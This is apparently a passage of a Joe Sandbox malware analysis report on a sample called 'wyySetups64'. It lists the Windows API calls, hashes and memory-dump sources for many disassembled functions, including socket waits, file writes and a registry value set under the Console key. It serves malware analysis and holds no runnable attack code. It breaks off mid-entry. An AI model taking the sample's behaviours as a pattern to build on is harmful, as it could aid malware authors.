                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 07608a3087b77eb9fe4b470712bffe531d391a167192072caf75ed635df61327
                                                                                                                                                                                                              • Instruction ID: a70bf561ebe1037c85a23f3fc56bf2d7ebd49d40c99a6255f2b409adfd02365b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07608a3087b77eb9fe4b470712bffe531d391a167192072caf75ed635df61327
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF513CB6E00211DFC724DF58C5C4969BBAABF89314B2980ADC50A9F321D736AD42CFD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD3883
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 00BD38C4
                                                                                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 00BD3931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD395C
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 00BD39F4
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 00BD3A22
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 00BD3A39
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058130114-0
                                                                                                                                                                                                              • Opcode ID: b4e7c7f10204c56213dc5a9f47dfe68852f0809335983ceb781957709beeadc9
                                                                                                                                                                                                              • Instruction ID: 455219dc1774d97c38f7c38854ac61b8d9153aea9d00cd2ccca89fdfe401430f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4e7c7f10204c56213dc5a9f47dfe68852f0809335983ceb781957709beeadc9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7151BE706007019BD7609F64C9957AAF7E4FF04B14F1005ABE95B9B382FBB5EA40CB42
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 03373883
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 033738C4
                                                                                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03373931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337395C
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 033739F4
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03373A22
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03373A39
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058130114-0
                                                                                                                                                                                                              • Opcode ID: 22514c1734ba45f00b00095b747a9738bbf5497a98bc224cdf162d5cac90761d
                                                                                                                                                                                                              • Instruction ID: 6fb60cac116c89027a35506dda55b43ce78df056ab9c2a316671716a4026b688
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22514c1734ba45f00b00095b747a9738bbf5497a98bc224cdf162d5cac90761d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E517C78A007059BDB70DF24CDC4BABB7E8BF05724F14491AD996DB680EB39E840DB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6BD
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337E6F2
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000), ref: 0337E6FF
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000), ref: 0337E70A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337E711
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0337E71E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4202892810-0
                                                                                                                                                                                                              • Opcode ID: 5b6f148700e5d62eab7ffb4b2d07c1dcd351deffce0f4a27c201cfbdeedf5327
                                                                                                                                                                                                              • Instruction ID: f9a046079420bd9a9d55f9057d0d36d363eff5b30ef3bb19344bedead4b90684
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b6f148700e5d62eab7ffb4b2d07c1dcd351deffce0f4a27c201cfbdeedf5327
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401C871241618FBE224B7A4BCCFF9B366CEB49B21F100605F715E61C4D7B5A81487A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BE7C00,00000008,00BD98EA,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C), ref: 00BD97F3
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BD9827
                                                                                                                                                                                                                • Part of subcall function 00BDC144: __mtinitlocknum.LIBCMT ref: 00BDC15A
                                                                                                                                                                                                                • Part of subcall function 00BDC144: __amsg_exit.LIBCMT ref: 00BDC166
                                                                                                                                                                                                                • Part of subcall function 00BDC144: EnterCriticalSection.KERNEL32(00000000,00000000,?,00BD99BA,0000000D,00BE7C28,00000008,00BD9AB1,00000000,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?), ref: 00BDC16E
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00BD9834
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BD9848
                                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 00BD9866
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                              • String ID: KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 637971194-2576044830
                                                                                                                                                                                                              • Opcode ID: 5f09637eb42cdb76f7fe382c20a581cd71dcf453d52148b77ddea0b2699dc46e
                                                                                                                                                                                                              • Instruction ID: b9541a569599287e38310a2207cc9f6786631d2f39f19be516e6ee785b8974c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f09637eb42cdb76f7fe382c20a581cd71dcf453d52148b77ddea0b2699dc46e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE01C0B1404B40DFD720AF6AD846349FBE0EF40324F10898FE4D69B3A1DBB0AA44CB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03396318,00000008,03383E36,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C), ref: 03383D3F
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03383D73
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __mtinitlocknum.LIBCMT ref: 03388E71
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __amsg_exit.LIBCMT ref: 03388E7D
                                                                                                                                                                                                                • Part of subcall function 03388E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03383F06,0000000D,03396340,00000008,03383FFF,00000000,?,033810F0,00000000,03396278,00000008,03381155,?), ref: 03388E85
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 03383D80
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03383D94
                                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 03383DB2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                              • String ID: KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 637971194-2576044830
                                                                                                                                                                                                              • Opcode ID: 5a764ff7ec27f823b183198ffe96111234cc50fd23a28ea9dd593dbfd3ecc140
                                                                                                                                                                                                              • Instruction ID: e0027f1f48b484f607ff251915e24d3a9f13270f7682625dd9780683ec2cdf5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a764ff7ec27f823b183198ffe96111234cc50fd23a28ea9dd593dbfd3ecc140
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63018479841B01EFEB20FF69D88574AFBE4AF40724F10490ED4D69B7A0CBB4A644CB15
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0337B7A7
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0337B7B7
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0337B7CE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000004), ref: 0337B7D9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CloseDeleteOpen
                                                                                                                                                                                                              • String ID: Console$IpDatespecial
                                                                                                                                                                                                              • API String ID: 3183427449-1840232981
                                                                                                                                                                                                              • Opcode ID: 1a2e8b592671692b8e1da4fd391b6a2874241733a6a1255e4683a3678311514b
                                                                                                                                                                                                              • Instruction ID: 7d58fa1d2cbec7c6299328075b8a03534b18b34fa42f2fc75580449656f99872
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a2e8b592671692b8e1da4fd391b6a2874241733a6a1255e4683a3678311514b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60F0A771354344FFF3259760AC8FF5BB758F789701F504A4FF784A52818665A140C755
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE3412
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE3423
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE3431
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                              • API String ID: 803148776-2671469338
                                                                                                                                                                                                              • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                                                              • Instruction ID: 8547b66db439011bbe87b5b686524592b8e8cd28b2562cf6bfdec0d8f9a9b434
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E01A306041888ED721AB69C48EB6877F4FB88715F5A00F6E41DCB363E728EE508942
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0339031D
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0339032E
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0339033C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                              • API String ID: 803148776-2671469338
                                                                                                                                                                                                              • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                                                              • Instruction ID: f014d6ed3b376f297581063f38b683c4c1343a37aea11598cef07c85aa08f5ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FE09A3D914304CFDB24EB68C5CAB6836D9BF48A25F5945A2D40CCF632D738E5908992
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03379C3F
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • _free.LIBCMT ref: 03379C63
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03379CBB
                                                                                                                                                                                                                • Part of subcall function 0337A610: GetObjectW.GDI32(?,00000054,?), ref: 0337A62E
                                                                                                                                                                                                              • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03379CD3
                                                                                                                                                                                                              • _free.LIBCMT ref: 03379CE4
                                                                                                                                                                                                              • _free.LIBCMT ref: 03379D23
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1756752955-0
                                                                                                                                                                                                              • Opcode ID: bc2bebcccc9a0edc6665aaa64e8256ba659b40b11fd59db5e803b5b0026c90b8
                                                                                                                                                                                                              • Instruction ID: 060834537fdcbd2a44c9aa46b8d3d5da9efc5de5d7f0bec6aeab27cdd2ce4c39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2bebcccc9a0edc6665aaa64e8256ba659b40b11fd59db5e803b5b0026c90b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD31A3B2600706ABE720DF25DDC0B56B7E8BF49310F04863AD909CB650E7B5E454CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF), ref: 00BD50AA
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000139F), ref: 00BD50C2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 00BD50CC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 41f9fe1f0bfb8a5ba5ca849a03a78ac5c01e2cef72fb90d92207b99c2f8e609a
                                                                                                                                                                                                              • Instruction ID: 697f5c228805b08c5bdb12333e363a021a6713b8fdae63995980b6e691a31574
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41f9fe1f0bfb8a5ba5ca849a03a78ac5c01e2cef72fb90d92207b99c2f8e609a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1316E76A04A44EBD720CF95ED86F6AB3E8FB48715F00495AF905C7781EB76A800CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF), ref: 033750CA
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000139F), ref: 033750E2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 033750EC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 4bc8bff3a406ea97d1dc9b889fc5b45a75e96e41918465bff976bc79d863cb88
                                                                                                                                                                                                              • Instruction ID: 149fe003f7a3b7382fd9eac17e1650bf17bbc3a22e0498301eeb2743e40d0569
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc8bff3a406ea97d1dc9b889fc5b45a75e96e41918465bff976bc79d863cb88
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE316C76A04748EBEB24DF55DDC5B6BB3ACEB49711F00495AE916C7680E73AA800CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48E1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48EC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 00BD48F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD4914
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD491D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 00BD492E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 640476663-0
                                                                                                                                                                                                              • Opcode ID: 35710c1c36bd65ff89a9c289a0b4af489b3416b06fbd09113e3f106b587ee15c
                                                                                                                                                                                                              • Instruction ID: 7c1e0574f68da02b60e635939754889b7f1b33aa6d2efec7d12648adb7e1405e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35710c1c36bd65ff89a9c289a0b4af489b3416b06fbd09113e3f106b587ee15c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B219A721046848BC720EBA8DC88987F3F9FF857647140B59F2948B392C7349C05CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00BE36CB
                                                                                                                                                                                                                • Part of subcall function 00BE325B: __getptd.LIBCMT ref: 00BE3269
                                                                                                                                                                                                                • Part of subcall function 00BE325B: __getptd.LIBCMT ref: 00BE3277
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36D5
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36E3
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36F1
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36FC
                                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 00BE3722
                                                                                                                                                                                                                • Part of subcall function 00BE3300: __CallSettingFrame@12.LIBCMT ref: 00BE334C
                                                                                                                                                                                                                • Part of subcall function 00BE37C9: __getptd.LIBCMT ref: 00BE37D8
                                                                                                                                                                                                                • Part of subcall function 00BE37C9: __getptd.LIBCMT ref: 00BE37E6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                                              • Opcode ID: 1dadeaccc8c238386d51fe6cfb1d703d6e0afd33a2f2936b1a4b7805af0e0710
                                                                                                                                                                                                              • Instruction ID: 1b956c6fd4d7262788fe92f078a80aee1314ec1be17a04335faaf520e6e893eb
